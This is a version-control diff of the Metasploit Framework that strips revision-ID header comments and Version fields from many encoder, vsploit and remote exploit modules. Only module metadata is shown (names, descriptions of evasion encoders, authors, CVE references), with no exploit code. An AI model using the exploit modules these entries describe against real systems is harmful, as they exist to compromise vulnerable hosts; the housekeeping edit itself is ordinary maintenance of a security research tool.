a/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb +++ b/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -16,7 +12,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VSploit Zeus DNS Query Module', - 'Version' => '$Revision$', 'Description' => 'This module queries known Zeus Botnet DNS records.', 'Author' => 'MJC', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/vsploit/pii/email_pii.rb b/modules/auxiliary/vsploit/pii/email_pii.rb index 8107c615b4..80773acd44 100644 --- a/modules/auxiliary/vsploit/pii/email_pii.rb +++ b/modules/auxiliary/vsploit/pii/email_pii.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,8 +23,7 @@ class Metasploit3 < Msf::Auxiliary should be flagged via an internal or external SMTP server. }, 'License' => MSF_LICENSE, - 'Author' => ['willis'], - 'Version' => '$Revision$' + 'Author' => ['willis'] )) register_options( [ diff --git a/modules/auxiliary/vsploit/pii/web_pii.rb b/modules/auxiliary/vsploit/pii/web_pii.rb index 7126189bb4..f424b34746 100644 --- a/modules/auxiliary/vsploit/pii/web_pii.rb +++ b/modules/auxiliary/vsploit/pii/web_pii.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary 'Description' => 'This module emulates a webserver leaking PII data', 'License' => MSF_LICENSE, 'Author' => 'MJC', - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.metasploit.com'], diff --git a/modules/encoders/cmd/generic_sh.rb b/modules/encoders/cmd/generic_sh.rb index 41f6b78c6c..ab43078de3 100644 --- a/modules/encoders/cmd/generic_sh.rb +++ b/modules/encoders/cmd/generic_sh.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Encoder def initialize super( 'Name' => 'Generic Shell Variable Substitution Command Encoder', - 'Version' => '$Revision$', 'Description' => %q{ This encoder uses standard Bourne shell variable substitution tricks to avoid commonly restricted characters. diff --git a/modules/encoders/cmd/ifs.rb b/modules/encoders/cmd/ifs.rb index f82ab049fd..758712adec 100644 --- a/modules/encoders/cmd/ifs.rb +++ b/modules/encoders/cmd/ifs.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Encoder def initialize super( 'Name' => 'Generic ${IFS} Substitution Command Encoder', - 'Version' => '$Revision$', 'Description' => %q{ This encoder uses standard Bourne shell variable substitution to avoid spaces without being overly fancy. diff --git a/modules/encoders/cmd/printf_php_mq.rb b/modules/encoders/cmd/printf_php_mq.rb index 224707540c..2334278d42 100644 --- a/modules/encoders/cmd/printf_php_mq.rb +++ b/modules/encoders/cmd/printf_php_mq.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Encoder def initialize super( 'Name' => 'printf(1) via PHP magic_quotes Utility Command Encoder', - 'Version' => '$Revision$', 'Description' => %q{ This encoder uses the printf(1) utility to avoid restricted characters. Some shell variable substituion may also be used diff --git a/modules/encoders/encoder_test.rb.ut.rb b/modules/encoders/encoder_test.rb.ut.rb index 5fa40db392..c61ba745a3 100644 --- a/modules/encoders/encoder_test.rb.ut.rb +++ b/modules/encoders/encoder_test.rb.ut.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/generic/none.rb b/modules/encoders/generic/none.rb index 334891f6fb..c8a0acc3b7 100644 --- a/modules/encoders/generic/none.rb +++ b/modules/encoders/generic/none.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -18,7 +14,6 @@ class Metasploit3 < Msf::Encoder def initialize super( 'Name' => 'The "none" Encoder', - 'Version' => '$Revision$', 'Description' => %q{ This "encoder" does not transform the payload in any way. }, diff --git a/modules/encoders/generic/none.rb.ut.rb b/modules/encoders/generic/none.rb.ut.rb index 3d71ddfaf9..0b4e178959 100644 --- a/modules/encoders/generic/none.rb.ut.rb +++ b/modules/encoders/generic/none.rb.ut.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/mipsbe/longxor.rb b/modules/encoders/mipsbe/longxor.rb index 1aa28125b1..6e01f655ba 100644 --- a/modules/encoders/mipsbe/longxor.rb +++ b/modules/encoders/mipsbe/longxor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,7 +15,6 @@ class Metasploit3 < Msf::Encoder::Xor def initialize super( 'Name' => 'XOR Encoder', - 'Version' => '$Revision$', 'Description' => %q{ Mips Web server exploit friendly xor encoder }, diff --git a/modules/encoders/mipsle/longxor.rb b/modules/encoders/mipsle/longxor.rb index 607997507a..2e7377f6a4 100644 --- a/modules/encoders/mipsle/longxor.rb +++ b/modules/encoders/mipsle/longxor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,7 +15,6 @@ class Metasploit3 < Msf::Encoder::Xor def initialize super( 'Name' => 'XOR Encoder', - 'Version' => '$Revision$', 'Description' => %q{ Mips Web server exploit friendly xor encoder }, diff --git a/modules/encoders/php/base64.rb b/modules/encoders/php/base64.rb index f6d545d303..481dd52ef7 100644 --- a/modules/encoders/php/base64.rb +++ b/modules/encoders/php/base64.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,7 +15,6 @@ class Metasploit3 < Msf::Encoder def initialize super( 'Name' => 'PHP Base64 Encoder', - 'Version' => '$Revision$', 'Description' => %q{ This encoder returns a base64 string encapsulated in eval(base64_decode()), increasing the size by a bit more than diff --git a/modules/encoders/ppc/longxor.rb b/modules/encoders/ppc/longxor.rb index ae8db7ec76..42f346b2cf 100644 --- a/modules/encoders/ppc/longxor.rb +++ b/modules/encoders/ppc/longxor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -18,7 +14,6 @@ class Metasploit3 < Msf::Encoder::Xor def initialize super( 'Name' => 'PPC LongXOR Encoder', - 'Version' => '$Revision$', 'Description' => %q{ This encoder is ghandi's PPC dword xor encoder with some size tweaks by HDM. diff --git a/modules/encoders/ppc/longxor_tag.rb b/modules/encoders/ppc/longxor_tag.rb index 9eab4a144b..8f59331223 100644 --- a/modules/encoders/ppc/longxor_tag.rb +++ b/modules/encoders/ppc/longxor_tag.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -18,7 +14,6 @@ class Metasploit3 < Msf::Encoder::Xor def initialize super( 'Name' => 'PPC LongXOR Encoder', - 'Version' => '$Revision$', 'Description' => %q{ This encoder is ghandi's PPC dword xor encoder but uses a tag-based terminator rather than a length. diff --git a/modules/encoders/sparc/longxor_tag.rb b/modules/encoders/sparc/longxor_tag.rb index 1f886c409c..f57b3c24ab 100644 --- a/modules/encoders/sparc/longxor_tag.rb +++ b/modules/encoders/sparc/longxor_tag.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -18,7 +14,6 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback def initialize super( 'Name' => 'SPARC DWORD XOR Encoder', - 'Version' => '$Revision$', 'Description' => %q{ This encoder is optyx's 48-byte SPARC encoder with some tweaks. }, diff --git a/modules/encoders/x64/xor.rb b/modules/encoders/x64/xor.rb index 0d15639b9b..7903b97075 100644 --- a/modules/encoders/x64/xor.rb +++ b/modules/encoders/x64/xor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -18,7 +14,6 @@ class Metasploit3 < Msf::Encoder::Xor def initialize super( 'Name' => 'XOR Encoder', - 'Version' => '$Revision$', 'Description' => 'An x64 XOR encoder. Uses an 8 byte key and takes advantage of x64 relative addressing.', 'Author' => [ 'sf' ], 'Arch' => ARCH_X86_64, diff --git a/modules/encoders/x86/alpha_mixed.rb b/modules/encoders/x86/alpha_mixed.rb index 9cfb1947ca..50da763ac4 100644 --- a/modules/encoders/x86/alpha_mixed.rb +++ b/modules/encoders/x86/alpha_mixed.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -18,7 +14,6 @@ class Metasploit3 < Msf::Encoder::Alphanum def initialize super( 'Name' => "Alpha2 Alphanumeric Mixedcase Encoder", - 'Version' => '$Revision$', 'Description' => %q{ Encodes payloads as alphanumeric mixedcase text. This encoder uses SkyLined's Alpha2 encoding suite. diff --git a/modules/encoders/x86/alpha_upper.rb b/modules/encoders/x86/alpha_upper.rb index 0a43f3d490..96580245d3 100644 --- a/modules/encoders/x86/alpha_upper.rb +++ b/modules/encoders/x86/alpha_upper.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Encoder::Alphanum def initialize super( 'Name' => "Alpha2 Alphanumeric Uppercase Encoder", - 'Version' => '$Revision$', 'Description' => %q{ Encodes payloads as alphanumeric uppercase text. This encoder uses SkyLined's Alpha2 encoding suite. diff --git a/modules/encoders/x86/avoid_underscore_tolower.rb b/modules/encoders/x86/avoid_underscore_tolower.rb index 4e753656bd..83f5e5b15b 100644 --- a/modules/encoders/x86/avoid_underscore_tolower.rb +++ b/modules/encoders/x86/avoid_underscore_tolower.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Encoder def initialize super( 'Name' => 'Avoid underscore/tolower', - 'Version' => '$Revision$', 'Description' => %q{ Underscore/tolower Safe Encoder used to exploit CVE-2012-2329. It is a modified version of the 'Avoid UTF8/tolower' encoder by skape. Please check diff --git a/modules/encoders/x86/avoid_utf8_tolower.rb b/modules/encoders/x86/avoid_utf8_tolower.rb index ae9a8c3bf2..32987db23d 100644 --- a/modules/encoders/x86/avoid_utf8_tolower.rb +++ b/modules/encoders/x86/avoid_utf8_tolower.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -117,7 +113,6 @@ class Metasploit3 < Msf::Encoder def initialize super( 'Name' => 'Avoid UTF8/tolower', - 'Version' => '$Revision$', 'Description' => 'UTF8 Safe, tolower Safe Encoder', 'Author' => 'skape', 'Arch' => ARCH_X86, diff --git a/modules/encoders/x86/call4_dword_xor.rb b/modules/encoders/x86/call4_dword_xor.rb index b7d291251f..e66ae57ec0 100644 --- a/modules/encoders/x86/call4_dword_xor.rb +++ b/modules/encoders/x86/call4_dword_xor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -18,7 +14,6 @@ class Metasploit3 < Msf::Encoder::Xor def initialize super( 'Name' => 'Call+4 Dword XOR Encoder', - 'Version' => '$Revision$', 'Description' => 'Call+4 Dword XOR Encoder', 'Author' => [ 'hdm', 'spoonm' ], 'Arch' => ARCH_X86, diff --git a/modules/encoders/x86/call4_dword_xor.rb.ut.rb b/modules/encoders/x86/call4_dword_xor.rb.ut.rb index c4960a6ae9..8ca4866fcb 100644 --- a/modules/encoders/x86/call4_dword_xor.rb.ut.rb +++ b/modules/encoders/x86/call4_dword_xor.rb.ut.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/x86/context_cpuid.rb b/modules/encoders/x86/context_cpuid.rb index bd854efa4e..4e305f93ce 100644 --- a/modules/encoders/x86/context_cpuid.rb +++ b/modules/encoders/x86/context_cpuid.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback def initialize super( 'Name' => 'CPUID-based Context Keyed Payload Encoder', - 'Version' => '$Revision$', 'Description' => %q{ This is a Context-Keyed Payload Encoder based on CPUID and Shikata Ga Nai. }, diff --git a/modules/encoders/x86/context_stat.rb b/modules/encoders/x86/context_stat.rb index c55a47260b..e8c4282835 100644 --- a/modules/encoders/x86/context_stat.rb +++ b/modules/encoders/x86/context_stat.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback def initialize super( 'Name' => 'stat(2)-based Context Keyed Payload Encoder', - 'Version' => '$Revision$', 'Description' => %q{ This is a Context-Keyed Payload Encoder based on stat(2) and Shikata Ga Nai. diff --git a/modules/encoders/x86/context_time.rb b/modules/encoders/x86/context_time.rb index 18d0a81b39..c59eac19c6 100644 --- a/modules/encoders/x86/context_time.rb +++ b/modules/encoders/x86/context_time.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback def initialize super( 'Name' => 'time(2)-based Context Keyed Payload Encoder', - 'Version' => '$Revision$', 'Description' => %q{ This is a Context-Keyed Payload Encoder based on time(2) and Shikata Ga Nai. diff --git a/modules/encoders/x86/countdown.rb b/modules/encoders/x86/countdown.rb index 56053038c3..d20785c9dc 100644 --- a/modules/encoders/x86/countdown.rb +++ b/modules/encoders/x86/countdown.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -18,7 +14,6 @@ class Metasploit3 < Msf::Encoder::Xor def initialize super( 'Name' => 'Single-byte XOR Countdown Encoder', - 'Version' => '$Revision$', 'Description' => %q{ This encoder uses the length of the payload as a position-dependent encoder key to produce a small decoder stub. diff --git a/modules/encoders/x86/countdown.rb.ut.rb b/modules/encoders/x86/countdown.rb.ut.rb index b3cc71bc5d..5c1755275b 100644 --- a/modules/encoders/x86/countdown.rb.ut.rb +++ b/modules/encoders/x86/countdown.rb.ut.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/x86/fnstenv_mov.rb b/modules/encoders/x86/fnstenv_mov.rb index 3d472e325c..65d79d05a7 100644 --- a/modules/encoders/x86/fnstenv_mov.rb +++ b/modules/encoders/x86/fnstenv_mov.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -18,7 +14,6 @@ class Metasploit3 < Msf::Encoder::Xor def initialize super( 'Name' => 'Variable-length Fnstenv/mov Dword XOR Encoder', - 'Version' => '$Revision$', 'Description' => %q{ This encoder uses a variable-length mov equivalent instruction with fnstenv for getip. diff --git a/modules/encoders/x86/fnstenv_mov.rb.ut.rb b/modules/encoders/x86/fnstenv_mov.rb.ut.rb index 529e0e6f79..a486d675f2 100644 --- a/modules/encoders/x86/fnstenv_mov.rb.ut.rb +++ b/modules/encoders/x86/fnstenv_mov.rb.ut.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/encoders/x86/jmp_call_additive.rb b/modules/encoders/x86/jmp_call_additive.rb index 5e276d2b7d..470d98d567 100644 --- a/modules/encoders/x86/jmp_call_additive.rb +++ b/modules/encoders/x86/jmp_call_additive.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback def initialize super( 'Name' => 'Jump/Call XOR Additive Feedback Encoder', - 'Version' => '$Revision$', 'Description' => 'Jump/Call XOR Additive Feedback', 'Author' => 'skape', 'Arch' => ARCH_X86, diff --git a/modules/encoders/x86/nonalpha.rb b/modules/encoders/x86/nonalpha.rb index 37731b7b98..5c63e4cd16 100644 --- a/modules/encoders/x86/nonalpha.rb +++ b/modules/encoders/x86/nonalpha.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Encoder::NonAlpha def initialize super( 'Name' => "Non-Alpha Encoder", - 'Version' => '$Revision$', 'Description' => %q{ Encodes payloads as non-alpha based bytes. This allows payloads to bypass both toupper() and tolower() calls, diff --git a/modules/encoders/x86/nonupper.rb b/modules/encoders/x86/nonupper.rb index e92a364e9c..6c7ae7bb1c 100644 --- a/modules/encoders/x86/nonupper.rb +++ b/modules/encoders/x86/nonupper.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Encoder::NonUpper def initialize super( 'Name' => "Non-Upper Encoder", - 'Version' => '$Revision$', 'Description' => %q{ Encodes payloads as non-alpha based bytes. This allows payloads to bypass tolower() calls, but will fail isalpha(). diff --git a/modules/encoders/x86/shikata_ga_nai.rb b/modules/encoders/x86/shikata_ga_nai.rb index a0ffda867c..6cfeec98ea 100644 --- a/modules/encoders/x86/shikata_ga_nai.rb +++ b/modules/encoders/x86/shikata_ga_nai.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback def initialize super( 'Name' => 'Polymorphic XOR Additive Feedback Encoder', - 'Version' => '$Revision$', 'Description' => %q{ This encoder implements a polymorphic XOR additive feedback encoder. The decoder stub is generated based on dynamic instruction diff --git a/modules/encoders/x86/single_static_bit.rb b/modules/encoders/x86/single_static_bit.rb index bf0592f1fc..569cc9db39 100644 --- a/modules/encoders/x86/single_static_bit.rb +++ b/modules/encoders/x86/single_static_bit.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Encoder def initialize super( 'Name' => 'Single Static Bit', - 'Version' => '$Revision$', 'Description' => 'Static value for specific bit', 'Author' => 'jduck', 'Arch' => ARCH_X86, diff --git a/modules/encoders/x86/unicode_mixed.rb b/modules/encoders/x86/unicode_mixed.rb index b47d229a41..43f754d7cb 100644 --- a/modules/encoders/x86/unicode_mixed.rb +++ b/modules/encoders/x86/unicode_mixed.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Encoder::Alphanum def initialize super( 'Name' => "Alpha2 Alphanumeric Unicode Mixedcase Encoder", - 'Version' => '$Revision$', 'Description' => %q{ Encodes payloads as unicode-safe mixedcase text. This encoder uses SkyLined's Alpha2 encoding suite. diff --git a/modules/encoders/x86/unicode_upper.rb b/modules/encoders/x86/unicode_upper.rb index 5301f80026..65e05a0f69 100644 --- a/modules/encoders/x86/unicode_upper.rb +++ b/modules/encoders/x86/unicode_upper.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Encoder::Alphanum def initialize super( 'Name' => "Alpha2 Alphanumeric Unicode Uppercase Encoder", - 'Version' => '$Revision$', 'Description' => %q{ Encodes payload as unicode-safe uppercase text. This encoder uses SkyLined's Alpha2 encoding suite. diff --git a/modules/exploits/aix/rpc_cmsd_opcode21.rb b/modules/exploits/aix/rpc_cmsd_opcode21.rb index a8fb6c4567..11020201af 100644 --- a/modules/exploits/aix/rpc_cmsd_opcode21.rb +++ b/modules/exploits/aix/rpc_cmsd_opcode21.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -36,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Rodrigo Rubira Branco (BSDaemon)', 'jduck', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3699' ], diff --git a/modules/exploits/aix/rpc_ttdbserverd_realpath.rb b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb index 742b7e9210..cf61ce9ea8 100644 --- a/modules/exploits/aix/rpc_ttdbserverd_realpath.rb +++ b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Ramon de C Valle', 'Adriano Lima ', ], - 'Version' => '$Revision$', 'Platform' => [ 'aix' ], 'References' => [ diff --git a/modules/exploits/apple_ios/browser/safari_libtiff.rb b/modules/exploits/apple_ios/browser/safari_libtiff.rb index d9a8eff764..d9cb3f2ce8 100644 --- a/modules/exploits/apple_ios/browser/safari_libtiff.rb +++ b/modules/exploits/apple_ios/browser/safari_libtiff.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => ['hdm', 'kf'], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-3459'], diff --git a/modules/exploits/apple_ios/email/mobilemail_libtiff.rb b/modules/exploits/apple_ios/email/mobilemail_libtiff.rb index b488909f79..8a819a630d 100644 --- a/modules/exploits/apple_ios/email/mobilemail_libtiff.rb +++ b/modules/exploits/apple_ios/email/mobilemail_libtiff.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => ['hdm', 'kf'], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-3459'], diff --git a/modules/exploits/bsdi/softcart/mercantec_softcart.rb b/modules/exploits/bsdi/softcart/mercantec_softcart.rb index 085b11fe93..c7055290a9 100644 --- a/modules/exploits/bsdi/softcart/mercantec_softcart.rb +++ b/modules/exploits/bsdi/softcart/mercantec_softcart.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 4.00b. }, 'Author' => [ 'skape', 'trew' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-2221'], diff --git a/modules/exploits/dialup/multi/login/manyargs.rb b/modules/exploits/dialup/multi/login/manyargs.rb index e55dbbfc04..f335e604f4 100644 --- a/modules/exploits/dialup/multi/login/manyargs.rb +++ b/modules/exploits/dialup/multi/login/manyargs.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html'], [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html'], ], - 'Version' => '$Revision$', 'Author' => [ 'I)ruid', diff --git a/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb b/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb index 00ab7533ca..cb7d6181e5 100644 --- a/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb +++ b/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote execute arbitrary code. }, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2010-4221'], diff --git a/modules/exploits/freebsd/samba/trans2open.rb b/modules/exploits/freebsd/samba/trans2open.rb index f07ac6d499..033b0fa0cc 100644 --- a/modules/exploits/freebsd/samba/trans2open.rb +++ b/modules/exploits/freebsd/samba/trans2open.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm', 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0201' ], diff --git a/modules/exploits/freebsd/tacacs/xtacacsd_report.rb b/modules/exploits/freebsd/tacacs/xtacacsd_report.rb index 98cb5833df..d9ff42c886 100644 --- a/modules/exploits/freebsd/tacacs/xtacacsd_report.rb +++ b/modules/exploits/freebsd/tacacs/xtacacsd_report.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote username, an attacker may be able to execute arbitrary code. }, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ ['CVE', '2008-7232'], diff --git a/modules/exploits/hpux/lpd/cleanup_exec.rb b/modules/exploits/hpux/lpd/cleanup_exec.rb index 786eba79d1..b7e7307e38 100644 --- a/modules/exploits/hpux/lpd/cleanup_exec.rb +++ b/modules/exploits/hpux/lpd/cleanup_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote HPSBUX0208-213. }, 'Author' => [ 'hdm' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2002-1473'], diff --git a/modules/exploits/irix/lpd/tagprinter_exec.rb b/modules/exploits/irix/lpd/tagprinter_exec.rb index a7b5bc863e..51bceebb53 100644 --- a/modules/exploits/irix/lpd/tagprinter_exec.rb +++ b/modules/exploits/irix/lpd/tagprinter_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'optyx', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2001-0800'], diff --git a/modules/exploits/linux/ftp/proftp_sreplace.rb b/modules/exploits/linux/ftp/proftp_sreplace.rb index 56615ba85b..6639ede3bb 100644 --- a/modules/exploits/linux/ftp/proftp_sreplace.rb +++ b/modules/exploits/linux/ftp/proftp_sreplace.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -56,7 +52,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Evgeny Legerov ', # original .pm version (VulnDisco) 'jduck' # Metasploit 3.x port ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-5815' ], diff --git a/modules/exploits/linux/ftp/proftp_telnet_iac.rb b/modules/exploits/linux/ftp/proftp_telnet_iac.rb index 6704b33697..4ae4c0525b 100644 --- a/modules/exploits/linux/ftp/proftp_telnet_iac.rb +++ b/modules/exploits/linux/ftp/proftp_telnet_iac.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -47,7 +43,6 @@ class Metasploit3 < 